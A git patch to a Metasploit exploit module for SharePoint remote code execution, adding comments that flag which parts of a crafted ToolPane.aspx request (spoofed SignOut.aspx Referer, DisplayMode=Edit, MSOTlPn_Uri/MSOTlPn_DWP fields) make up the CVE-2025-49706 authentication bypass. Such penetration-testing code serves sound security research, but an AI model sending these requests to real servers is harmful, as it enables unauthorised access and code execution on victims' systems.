From 6d9d9a70d410cc94de4d3d9afd7a75cd426d43be Mon Sep 17 00:00:00 2001
From: sfewer-r7 <stephen_fewer@rapid7.com>
Date: Fri, 25 Jul 2025 11:01:22 +0100
Subject: [PATCH] add some comments to clarify what CVE-2025-49706 is

---
 modules/exploits/windows/http/sharepoint_toolpane_rce.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
index 4224defbbf..acb5d3d8a5 100644
--- a/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
+++ b/modules/exploits/windows/http/sharepoint_toolpane_rce.rb
@@ -299,14 +299,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '_layouts', '15', 'ToolPane.aspx'),
       'ctype' => 'application/x-www-form-urlencoded',
       'headers' => {
-        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx')
+        'Referer' => normalize_uri(target_uri.path, '_layouts', 'SignOut.aspx') # This is part of CVE-2025-49706
       },
       'vars_get' => {
-        'DisplayMode' => 'Edit',
-        'a' => '/ToolPane.aspx'
+        'DisplayMode' => 'Edit', # This is part of CVE-2025-49706
+        Rex::Text.rand_text_alpha_lower(8..16) => '/ToolPane.aspx' # This is part of CVE-2025-49706
       },
       'vars_post' => {
-        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')),
+        'MSOTlPn_Uri' => full_uri(normalize_uri(target_uri.path, '_controltemplates', '15', 'AclEditor.ascx')), # This is part of CVE-2025-49706
         'MSOTlPn_DWP' => xml
       }
     )